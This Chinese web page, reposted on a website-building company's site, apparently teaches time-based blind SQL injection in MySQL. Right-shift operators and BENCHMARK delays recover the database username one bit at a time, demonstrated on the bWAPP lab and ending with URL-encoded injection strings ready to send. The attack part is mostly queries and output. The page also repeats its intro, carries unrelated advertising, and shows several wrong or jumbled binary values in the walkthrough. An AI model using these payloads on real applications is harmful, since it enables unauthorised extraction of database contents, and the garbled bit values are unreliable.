大橙子网站建设,新征程启航
为企业提供网站建设、域名注册、服务器等服务
本篇内容主要讲解“如何使用位函数和运算符进行基于时间的高效SQL盲注”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何使用MySQL位函数和运算符进行基于时间的高效SQL盲注”吧!
本篇内容主要讲解“如何使用位函数和运算符进行基于时间的高效SQL盲注”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何使用MySQL位函数和运算符进行基于时间的高效SQL盲注”吧!
成都创新互联公司专注为客户提供全方位的互联网综合服务,包含不限于网站建设、成都网站建设、商都网络推广、小程序开发、商都网络营销、商都企业策划、商都品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;成都创新互联公司为所有大学生创业者提供商都建站搭建服务,24小时服务热线:18980820575,官方网址:www.cdcxhl.com
右移位运算符会将二进制值1位的位数向右移位,如下所示:mysql> select ascii(b'01110010');+--------------------+| ascii(b'01110010') |+--------------------+| 114 |+--------------------+1 row in set (0.00 sec)mysql> select ascii(b'01110010') >> 1;+-------------------------+| ascii(b'01110010') >> 1 |+-------------------------+| 57 |+-------------------------+1 row in set (0.00 sec)
这可用于在SQL盲注时枚举字符串的字符。如果数据出现在完整的ASCII表中,则每个字符最多可以枚举8个请求。
这里我们希望提取的数据是select user()查询返回的第一个字符。第1位:
我们首先找到第一位的值:?
???????
有两种可能性:0 (Decimal value: 0
) // TRUE condition
或1 (Decimal value: 1
) // FALSE conditionmysql> select if ((ascii((substr(user(),1,1))) >> 7 )=0,benchmark(10000000,sha1('test')), 'false');+--------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 7 )=0,benchmark(10000000,sha1('test')), 'false') |+--------------------------------------------------------------------------------------+| 0 |+--------------------------------------------------------------------------------------+1 row in set (2.35 sec)
SQL查询导致时间延迟,因此条件为TRUE,第一位为00
???????第2位:
现在我们来查找第二位的值,和上面一样有两种可能性:00 (Decimal value: 0
) // TRUE condition
或01 (Decimal value: 1
) // FALSE conditionmysql> select if ((ascii((substr(user(),1,1))) >> 6 )=0,benchmark(10000000,sha1('test')), 'false');+--------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 6 )=0,benchmark(10000000,sha1('test')), 'false') |+--------------------------------------------------------------------------------------+| false |+--------------------------------------------------------------------------------------+1 row in set (0.00 sec)
SQL查询没有发生时间延迟,因此条件为FALSE第二位为101
?????第3位:
现在我们查找第三位的值,同样两种可能性:010 (Decimal value: 2
) // TRUE
或011 (Decimal value: 3
) // FALSEmysql> select if ((ascii((substr(user(),1,1))) >> 5 )=2,benchmark(10000000,sha1('test')), 'false');+--------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 5 )=2,benchmark(10000000,sha1('test')), 'false') |+--------------------------------------------------------------------------------------+| false |+--------------------------------------------------------------------------------------+1 row in set (0.00 sec)
SQL查询没有时间延迟,因此条件为FALSE第三位为1011
?????第4位:
现在我们查找第四位的值,两种可能性:0110 (Decimal: 6
) // TRUE
或0111 (Decimal: 7
) // FALSEmysql> select if ((ascii((substr(user(),1,1))) >> 4 )=6,benchmark(10000000,sha1('test')), 'false');+--------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 4 )=6,benchmark(10000000,sha1('test')), 'false') |+--------------------------------------------------------------------------------------+| false |+--------------------------------------------------------------------------------------+1 row in set (0.00 sec)
SQL查询没有时间延迟,因此条件为FALSE第四位为10111
????第5位:
现在我们查找第五位的值,两种可能性:01110 (Decimal: 14
) /// TRUE
或01111 (Decimal: 15
) // FALSEmysql> select if ((ascii((substr(user(),1,1))) >> 3 )=14,benchmark(10000000,sha1('test')), 'false');+---------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 3 )=14,benchmark(10000000,sha1('test')), 'false') |+---------------------------------------------------------------------------------------+| 0 |+---------------------------------------------------------------------------------------+1 row in set (2.46 sec)
SQL查询导致时间延迟,因此条件为TRUE第五位为001110
???第6位:
现在我们查找第六位的值,两种可能性:011100 (Decimal: 28
) // TRUE
或011101 (Decimal: 29
) // FALSEmysql> select if ((ascii((substr(user(),1,1))) >> 2 )=28,benchmark(10000000,sha1('test')), 'false');+---------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 2 )=28,benchmark(10000000,sha1('test')), 'false') |+---------------------------------------------------------------------------------------+| 0 |+---------------------------------------------------------------------------------------+1 row in set (2.44 sec)
SQL查询导致时间延迟,因此条件为TRUE第六位为0011100
??第7位:
现在我们查找第七位的值,两种可能性:0111000
(Decimal: 56) // TRUE
或0111001
(Decimal: 57) // FALSEmysql> select if ((ascii((substr(user(),1,1))) >> 1 )=56,benchmark(10000000,sha1('test')), 'false');+---------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 1 )=56,benchmark(10000000,sha1('test')), 'false') |+---------------------------------------------------------------------------------------+| false |+---------------------------------------------------------------------------------------+1 row in set (0.00 sec)
SQL查询没有时间延迟,因此条件为FALSE第七位为1
第四位必须为10111001
?第8位:
现在我们查找第八位的值,两种可能性:01110010 (Decimal: 114
) // TRUE
或01110011 (Decimal: 115
) // FALSEmysql> select if ((ascii((substr(user(),1,1))) >> 0 )=114,benchmark(10000000,sha1('test')), 'false');+----------------------------------------------------------------------------------------+| if ((ascii((substr(user(),1,1))) >> 0 )=114,benchmark(10000000,sha1('test')), 'false') |+----------------------------------------------------------------------------------------+| 0 |+----------------------------------------------------------------------------------------+1 row in set (2.33 sec)
SQL查询导致时间延迟,因此条件为TRUE第八位为00111001
0到这里我们就完整获取到了select user() 查询返回的第一个字符的二进制值,转换成十进制后为114。而114在ASCII表中表示的是r
字符,因此该数据库用户名的首字母为r。mysql> select user();+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)
为了说明这种类型的SQL盲注攻击,我已向大家演示了如何在bWAPP易受攻击的应用程序上,枚举“select user()”返回的第一个字符的第一个和最后一个二进制位:https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
1. 第一位SQLi字符串返回TRUE条件:test%27+and+if+((ascii((substr(user(),1,1)))+>>+7+)=0,benchmark(5000000,md5('test')),+'false')%23
2. 第一位SQLi字符串返回FALSE条件:test%27+and+if+((ascii((substr(user(),1,1)))+>>+7+)=1,benchmark(5000000,md5('test')),+'false')%23
3. 第八位SQLi字符串返回FALSE条件:
test%27+and+if+((ascii((substr(user(),1,1)))+>>+0+)=114,benchmark(5000000,md5('test')),+'false')%23